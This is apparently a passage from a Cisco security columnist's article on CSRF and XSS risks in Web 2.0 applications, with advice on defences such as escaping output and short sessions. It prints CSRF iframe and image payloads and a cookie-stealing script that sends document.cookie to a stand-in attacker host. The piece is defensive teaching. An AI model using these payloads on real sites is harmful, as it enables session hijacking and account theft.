Of course, your friendly neighborhood hacker sees this as an opportunity for a cross-site request forgery attack. It's kind of like Address Resolution Protocol (ARP) spoofing for URLs. We use lots of Ajax in Web 2.0 apps to speed up the browser load time because it can make a bunch of little HTTP GETS to update only a small piece of a page instead of the entire app. Now, because of the same origin policy, many code jockeys believe that since XMLHttpRequest (XHR) will only speak to the origin page they are safe. That's kind of like going fishing with a can of corn, because fish like corn, you can put corn on a hook, so ... This works by a hacker embedding malicious HTML or JavaScript code into an e-mail or Web site to request a specific "task url," which implements without the user's knowledge, either directly or by utilizing a cross-site scripting (XSS) flaw. It would look like this:
<strong>IFRAME SRC</strong> <iframe src="http://host/?command">
JavaScript Methods <strong>'Image' Object</strong> <script> var twtv = new Image(); twtv.src = "http://host/?command"; </script>
Preventing this attack is not as tough as getting in-laws to leave before supper time; you just have to plan. First make sure your site is not vulnerable to XSS attacks. If a single XSS flaw exists, then there is no good way to prevent a Cross Site Request Forgery (CSRF) issue from being exploited. This is truly job one for us people going to Web 2.0. Your site must be free from XSS (Cross-Site Scripting) issues. Also, configuring a short timeout period for user sessions is as important as choosing the right fishing bait. If your sites require the user to be logged in before performing an action, setting the user's session to a short session period (three minutes should work) will reduce the odds of a successful CSRF attack. I also recommend that you prompt the user with a login page and/or strong Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) each time an important site action is performed. You may read about things like rotating tokens that sound good; my concern with this is that single browser vulnerability can allow a hacker to snag your session token, and then game over.
The final issue, but certainly not last, is XSS. I mentioned this earlier, but let's take a look at what it is and what to do about it. Basically, a hacker forces a Web site to echo evil executable code, which loads in a user's browser. The majority of this code is in HTML/JavaScript, but I have also seen it in ActiveX and Flash. Basically, whatever the browser supports can lend itself to a code vector. If a hacker can get a user's browser to execute the code, it will run within the security context of the hosting Web site. Because of this level of privilege, the code has the ability to read, modify, and transmit any data the browser can access. Hacked or really hijacked users can have their account stolen by stealing the cookies (remember all the "click here to remember me" login buttons), redirecting the browser to show fake content, and so on. I would steal cookies with a small piece of code like this:
<SCRIPT> document.location= 'http://hax0r.example/cgi- bin/cookiesteal.cgi?'+document.cookie </SCRIPT>
I would never get you to run this code, but if you add some marketing knowledge and change the packaging you get this:
I love Twitter (come over and follow me!). I get tinyurl requests all the time because the letter space follows Short Message Service (SMS) rules: 168 characters. I never send them or open them. I strongly recommend that you don't either. They are excellent ways to hide XSS attacks. Preventing XSS can be done by removing strings or characters, but that can be tricky because many apps use different characters for different things. Personally, I like escaping user-supplied data within Web, Ajax, and so on calls. I know this is a real pain because we have to escape with URL/JavaScript or HTML entity encoding.
Web 2.0 is cool and here to stay. No need to freak out about it. It's the same old story: To keep the Internet in balance, good stuff exploited by bad stuff, fixed by good stuff, it's a whole circle-of-life kind of situation. ... I feel like breaking out in a song ...
See more columns by Jimmy Ray Purser
Jimmy Ray Purser is a networking and network security expert at Cisco Systems.
Previous 
